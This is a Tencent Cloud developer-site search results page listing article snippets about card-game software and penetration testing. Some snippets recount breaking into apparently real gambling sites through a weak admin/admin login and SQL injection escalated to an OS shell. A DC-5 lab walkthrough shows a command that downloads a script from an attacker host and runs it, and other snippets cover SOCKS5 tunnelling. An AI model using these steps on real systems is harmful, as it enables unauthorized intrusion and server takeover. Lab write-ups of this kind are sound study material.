- 综合排序
- 最热优先
- 最新优先
- 来自专栏黑战士安全
某棋牌渗透测试
一、信息收集这里通过fofa进行收集,语法为:body=某棋牌 && title=xxx图1-1 fofa资产收集二、漏洞挖掘通过手工及AWVS测试站点手工测试发现弱口令admin/admin成功进入后台图 2-1 棋牌后台查看相应功能点图2-2 棋牌用户图2-3 棋牌控制AWVS测试发现Sql注入图2-4 AWVS高危漏洞三、漏洞利用由于手工进入后台无法getshell,这里使用AWVS扫描出的Sql注入进行测试首先将数据包放入 接下来查看对方是否数据库为dba权限,如果是尝试os-shell获取对方服务器权限图 3-2 DBA权限图图 3-3 os-shell至此已拿到对方服务器权限成功执行任意命令结束语出此文章的初衷也是为了告诫在玩棋牌
60210编辑于 2024-06-20 - 来自专栏Opensource翻译专栏
5 款Linux平台上的棋牌游戏
本文我将介绍棋牌类型的游戏来继续有关Linux开源游戏的系列文章。在以后的文章中,我计划介绍益智、赛车,角色扮演以及策略与模拟类游戏。
4.6K00发布于 2019-12-23 - 来自专栏世荣的博客
渗透测试笔记-5
执行一个外部的应用程序的输入并显示输出的结果 2.exec():执行一个外部的应用程序,但不显示输出的结果 3.passthru():执行一个系统命令并显示原始的输出 4.shell_exec():执行shell命令并返回输出的结果的字符串 5. 7.0之后的demo: 3.call_user_func():回调函数,可以使用is_callable查看是否可以进行调用 4.call_user_fuc_array():回调函数,参数为数组 5.create_function ():创建匿名函数 5.preg_replace():当php版本小于7时,当为 /e 时代码会执行 6.array_map():为数组的每个元素应用回调函数 7.array_filter():依次将
46520编辑于 2022-03-18 - 来自专栏靶机渗透
靶机渗透DC-5
注意,Shell需要进入/tmp/目录下,同时kali也是在/tmp/目录下开启服务,否则传输会找不到文件。
59701发布于 2020-04-18 - 来自专栏网络安全自修室
DC-5靶机渗透实战
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 靶机下载地址:http://www.five86.com/dc-5.html 信息搜集 直接上nmap进行扫描 nmap -sV -A -p- 172.16.0.17 Nmap scan report done: 1 IP address (1 host up) scanned in 18.20 seconds 可知开放111、80、59243端口,linux主机 猜测从web页面拿到shell 渗透实战 /tmp$ ls ls libhax.so rootshell run.sh www-data@dc-5:/tmp$ chmod +x run.sh chmod +x run.sh www-data @dc-5:/tmp$ .
1.1K30发布于 2020-07-22 - 来自专栏吾生也有涯IT也无涯
VulnHub靶机渗透之DC:5
这次的内容是DC系列的第五个靶机,不得不说这个系列每一个靶机都很有代表性,闲话少叙,搞起来。
1.6K31发布于 2019-07-25 - 来自专栏吾生也有涯IT也无涯
堆栈溢出渗透实战-part5
这是这个靶机环境的最后一个flag了,目标是获取root用户shell,不知道作者会设置些什么样的障碍,一步一步试吧,渗透技术不就是通过不断的尝试来找到各种脑洞大开的方法嘛。 将shellocde输入到5.txt,并用5.txt的内容做为输入,执行levelFive,成功获得shell,但是确没有得到root权限,看来还是少了点什么。 ?
70040发布于 2019-07-25 - 来自专栏软件方法
棋牌馆管理系统的用例图
潘老师,这个系统用例合适吗? Simplicity(191***517)10:29:45
89610编辑于 2022-04-11 - 来自专栏猛牛哥的博客
某棋牌游戏大厅座位内存分析过程
今天有业务,需要分析某棋牌游戏房间内的座位内存。 目标:通过内存判断每个座位上是否有玩家。所以,要找到每个桌子、每个座位相关内存的排布规律及其内存基址。 游戏大厅截图: ? 看来这个棋牌大厅的内存数据设计和其他棋牌不一样。暂无其他办法,先分析找到的这个内存。观察后发现,每桌5个座位,该内存块连续存储5个玩家的金币值,每个座位的金币值内存间隔为8。 pop edi 02ED806D |. 5E pop esi 02ED806E |. 5D pop ebp 02ED806F FFD5 call ebp 02ECA43F |> 5D pop ebp 02ECA440 |. 5F pop edi 02ECA441 FFD5 call ebp 02ECA37D |> 5D pop ebp 02ECA37E |. 5F pop edi 02ECA37F
2.6K30发布于 2019-01-03 - 来自专栏鸿鹄实验室
记一次棋牌站点的沦陷
赤裸裸的棋牌站???简单查看下架构: windows服务器,再加上之前查看端口时发现开放了1433,这类网站存在注入的几率还是很大的,简单探测后发现并没有什么waf。
60430发布于 2021-03-31 - 来自专栏码农UP2U
TDD 在棋牌游戏算法中的应用
棋牌游戏一直以来都是受欢迎的休闲娱乐方式,而其中的算法设计对于游戏的平衡性和公正性至关重要。 测试驱动开发(Test-Driven Development,简称TDD)正是一种在棋牌游戏算法开发中广泛应用的方法。本文将探讨TDD在棋牌游戏算法中的应用,并介绍其优势。 首先,TDD能够确保棋牌游戏算法的正确性。在TDD中,开发者首先编写测试用例,定义了期望的输入和输出。然后,根据测试用例编写算法代码。 此外,TDD还能够提高棋牌游戏算法的性能。在TDD的过程中,开发者需要不断运行测试用例,检查算法的性能是否满足要求。 对于开发者而言,采用TDD方法进行棋牌游戏算法的开发是一种明智的选择。
46220编辑于 2023-09-02 - 来自专栏网络空间安全
内网渗透之隐藏通信隧道 -- sock5
SOCKS分为SOCKS 4和SOCKS 5两种类型: SOCKS 4只支持TCP协议;SOCKS5不仅支持TCP/UDP协议,还支持各种身份验证机制等,其标准端口为1080.SOCKS能够与目标内网计算机进行通信 正向连接 在目标机器假设一个socks5通道 ew_for_Win.exe -s ssocksd -l 6666 ? 在攻击机上测试代理 成功 ? 成功远程连接到2008的内网ip ? //这个是额外加的,用于创建一个socks5的通道,可以给其他主机连接 type = tcp remote_port = 6000 plugin = socks5 再回头看服务端 可以看到同时开了一个Sock5通道,使用其他攻击机进行连接 ? 我使用Proxifier来进行连接,Proxifier资源在网上很好找,我就不放下载链接了 ? ? 注意这里windows 7的frpc配置和其他不一样的点,这里多了一条 plugin = socks5 这一条很关键,后面我会说为什么 ?
6.9K21编辑于 2022-01-23 - 来自专栏AlgorithmDog的专栏
动手写一个 DQN 的棋牌 AI
(手上确认一直都是5张牌);在出牌阶段,先打完手上牌的玩家获胜。 RoomAI 是非完美信息游戏 AI 环境。 近年来,人工智能在棋牌游戏 AI 领域进步神速。 3.1 第一步,网络结构 动手写一个棋牌 AI 的第一步就是确定网络结构。 状态特征是 15 * 5 大小的 8 层图片,15 * 5 中每行对应一个点数和每列代表一个花色,花色一共有 4 个正常花色和大小王的虚拟花色。 5. 结论 深度强化学习是学术界研制游戏 AI 的主流算法。这篇文章我们将用深度强化学习早期代表算法 DQN 算法探索棋牌 AI。
4.6K100发布于 2018-02-07 - 来自专栏闪石星曜CyberSecurity
对某棋牌站的一次Getshell
最近在fofa翻目标C段的时候,碰巧看到了个BC站,便记了下来,等下班回家后直接拿下
1.6K30发布于 2021-03-25 - 来自专栏vulnhub DC 1-9
VulnHub DC-5 靶机渗透测试笔记
VulnHub DC-5 靶机渗透测试笔记靶机信息• 靶机名称:DC-5• 靶机来源:VulnHub• 目标:获取 root 权限,找到最终 flag• 难度:⭐⭐⭐☆☆(中等)• 涉及技术:信息收集、 系统扫描结果• 192.168.168.1 → VM8 网卡• 192.168.168.2 → 网关• 192.168.168.128 → Kali 本机• 192.168.168.169 → 靶机 DC-5• 1234 cd /tmpwget http://192.168.168.128:8888/41154.shchmod 777 41154.shbash 41154.sh找到 flag:八、渗透流程总结 WappalyzerCMS/框架识别Burp Suite抓包、日志污染注入wfuzz参数爆破蚁剑Webshell 管理工具nc反弹 Shellsearchsploit本地漏洞库搜索本文为 VulnHub DC-5
9710编辑于 2026-03-07 - 来自专栏网络安全自修室
每周打靶 | Vulnhub-DC5靶机渗透实战
靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! = 使用中国蚁剑连接MM 使用命令查看存在权限的命令,查看权限发现screen-4.5.0特殊文件 提权 查询screen-4.5.0的利用脚本,发现存在 root@bbkali:/tmp/dc5# ----------------- ---------------------------------------- Shellcodes: No Result root@bbkali:/tmp/dc5# Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators Copied to: /tmp/dc5/ libhax.c 使用vim命令创建第二个rootshell.c,复制粘贴完内容后按下esc输入:wq保存退出 再编译 gcc -o rootshell rootshell.c 最后一个部分dc5.
67631编辑于 2023-09-02 - 来自专栏Golang语言社区
系统架构之二(棋牌类游戏常用架构)
棋牌类游戏常用架构: 我从事过4年的棋牌类游戏开发,使用过的架构大致如上,各模块解释如下。
2.7K71发布于 2018-03-23 - 来自专栏Golang语言社区
棋牌游戏服务器架构: 总体设计
首先要说明的是, 这个棋牌游戏的服务器架构参考了网狐棋牌的架构。网狐棋牌最令人印象深刻的是其稳定性和高网络负载。 这个架构延续了网狐棋牌在网络组件所作的努力,这个棋牌的服务器也使用异步IO作为网络的工作方式,更为彻底的是其数据库也是采用异步架构。 游戏类型信息: 棋牌游戏、休闲游戏、视频游戏等。 2. 游戏种类: 比如在棋牌游戏这个大类之下有:德州扑克、斗地主、升级等。 3. 图5给出了RoomServer与外界交互的图。 ? 图5 RoomServer与外界的交互图 RoomServer启动的时候,先要发送请求给CenterServer进行注册,在关闭时要从CenterServer中注销。
5.2K70发布于 2018-03-23 - 来自专栏玄魂工作室
渗透,持续渗透,后渗透的本质
目标主机信息搜集的深度,决定后渗透权限持续把控。 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。 后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。 靶机背景介绍: ? 引言(2): 渗透测试过程,提权是非核心任务,这里也不建议尝试提权,因为在实战过程中获取某个“点”的权限,过程是及其漫长以及困难的,不要因为某个大胆的尝试,而影响了整个渗透测试流程。 后者的话: APT攻击三大要素,既:攻击手段复杂,持续时间长,高危害性 APT攻击主要分类为两大类,既:高级持续渗透 , 即时渗透 ? ? ? ? APT两大类攻击核心诉求区别: ? 引言(5): 目前市场上的企业网络安全规划与建设大部分存在统一实施方案,或者是模板方案。而非针对特定行业,特定客户群体来制定针对方案。而不同行业,不同背景的企业安全规划方案也一定是不相同的。
1.8K30发布于 2019-03-14 - 来自专栏程序源代码
一款前端CocosCreater后端java的开源棋牌游戏
开源棋牌游戏 开源棋牌游戏,包含麻将、德州、斗地主。首个版本会采用当前最流行的房卡模式。贝密游戏是一系列棋牌游戏的名称,其中包含麻将、斗地主、德州。
11.9K41发布于 2018-09-21
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号